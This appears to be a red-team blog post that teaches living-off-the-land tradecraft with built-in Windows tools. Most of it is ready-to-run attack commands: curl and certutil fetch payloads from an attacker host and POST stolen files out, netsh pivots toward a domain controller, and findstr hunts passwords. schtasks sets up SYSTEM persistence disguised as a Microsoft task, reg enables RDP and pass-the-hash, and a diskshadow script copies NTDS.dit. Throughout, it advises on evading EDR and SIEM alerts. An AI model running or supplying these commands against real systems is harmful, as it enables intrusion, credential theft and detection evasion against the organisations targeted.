Your effectiveness as a red team operator comes down to how well you can disappear into the noise. Custom binaries get flagged. Noisy C2 beacons get caught. But the CLI tools that admins use every day? Those blend right in.
Windows ships with more useful tools than most people realize. Some are old classics like certutil and netsh. Others are newer additions like native curl and tar that Microsoft quietly added to Windows 10. And then there’s diskshadow, which lets you steal domain databases without tripping the usual alarms.
curl and tar#
Starting with Windows 10 build 1803, Microsoft includes real versions of curl.exe and tar.exe. No more PowerShell gymnastics just to make a web request or compress a folder.
curl for transfers#
curl is less suspicious than certutil because developers actually use it for legitimate API work.
:: Download a payload
curl.exe -o C:\Windows\Temp\update.exe http://10.10.10.5/beacon.exe
:: Exfiltrate data via POST
curl.exe -X POST -d @C:\Windows\Temp\loot.txt http://10.10.10.5/api/log_uploadtar for compression#
Stop writing PowerShell scripts just to zip files.
:: Archive the CEO's documents folder
tar.exe -cvf C:\Windows\Temp\logs.zip C:\Users\CEO\Documentscertutil#
certutil.exe manages certificates, but red teamers repurpose it as a downloader and encoder.
certutil -urlcache -f is one of the most burned signatures in EDR. Only use it when you’re sure monitoring is offline or blind to it.
Download files#
certutil.exe -urlcache -split -f http://attacker.com/shell.exe C:\Windows\Temp\shell.exeBase64 encoding#
Useful for smuggling payloads as text files past email filters or upload restrictions.
:: Encode on attacker side
certutil.exe -encode payload.exe payload.txt
:: Decode on victim
certutil.exe -decode payload.txt payload.exenetsh#
netsh lets you reconfigure the networking stack without external tools. Essential for pivoting.
Port forwarding#
Forward local port 4455 to the domain controller’s SMB port:
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=0.0.0.0 connectport=445 connectaddress=10.0.0.5Firewall rules#
netsh advfirewall firewall add rule name="OpenPort" dir=in action=allow protocol=TCP localport=4455wmic#
Microsoft is removing WMIC from newer Windows 11 builds in favor of PowerShell CIM cmdlets, but it’s still present on most Windows Server installs.
Remote process execution#
wmic /node:"10.0.0.5" process call create "cmd.exe /c whoami > C:\temp\out.txt"Software removal#
wmic product where name="VulnerableApp" call uninstallfindstr#
Windows’ answer to grep. Essential for hunting passwords in config files.
:: Search recursively for sensitive terms
findstr /S /I /M "password secret key" *.xml *.config *.txt *.iniFlags: /S for recursive, /I for case-insensitive, /M to print only filenames.
schtasks#
Scheduled tasks survive reboots and can run as SYSTEM. Reliable persistence that looks administrative.
Create a recurring task#
schtasks /create /tn "Microsoft\Windows\Recovery\CleanUp" /tr "C:\Windows\Temp\update.exe" /sc minute /mo 30 /ru "SYSTEM"The task name mimics Microsoft’s naming convention. It runs every 30 minutes as SYSTEM.
reg#
When PowerShell isn’t available, reg handles direct registry manipulation.
Enable RDP#
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fDon’t forget to open the firewall with netsh.
Enable pass-the-hash for RDP#
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /fdiskshadow#
vssadmin logs Event ID 216, which most SIEMs flag. diskshadow.exe can script Volume Shadow Copies with less noise, perfect for stealing NTDS.dit.
Create shadow.txt:
set context persistent nowriters
add volume c: alias shadow_c
create
expose %shadow_c% z:
exec "cmd.exe /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit"
delete shadows volume %shadow_c%
resetRun it:
diskshadow.exe /s shadow.txtThe script creates a shadow copy, mounts it as Z:, copies the AD database, then cleans up. Much quieter than the usual vssadmin approach.
Conclusion#
Mastering the Windows CLI isn’t about memorizing flags; it’s about understanding underlying system capabilities. When you use curl for transfers, diskshadow for data theft, and findstr for hunting secrets, you operate within the system’s own logic. This “live off the land” approach is a hallmark of professional red teaming.
